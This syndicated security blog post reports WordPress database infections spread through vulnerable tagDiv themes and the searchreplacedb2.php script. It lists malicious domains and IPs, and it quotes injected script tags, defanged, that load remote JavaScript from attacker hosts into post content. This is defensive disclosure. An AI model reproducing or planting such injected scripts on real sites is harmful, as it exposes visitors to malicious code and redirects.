Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type=’text/javascript’ src=’hxxps://con1.sometimesfree[.]biz/c.js’></script>

Or:

<s cript type=”text/javascript”>var t = document.createElement(“script”);
t.type = “text/javascript”; t.src = “hxxps://src[.]dancewithme[.]biz/src.js“;
document.head.appendChild(t);</script>

Or:

The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
  • java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
  • js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
  • go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
  • traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
  • blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
  • get.simplefunsite[.]info/rw.js (won’t resolve atm)
  • post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
  • src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
  • go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on Aug 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite.info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.

This is a Security Bloggers Network syndicated blog post authored by Denis Sinegubko. Read the original post at: Sucuri Blog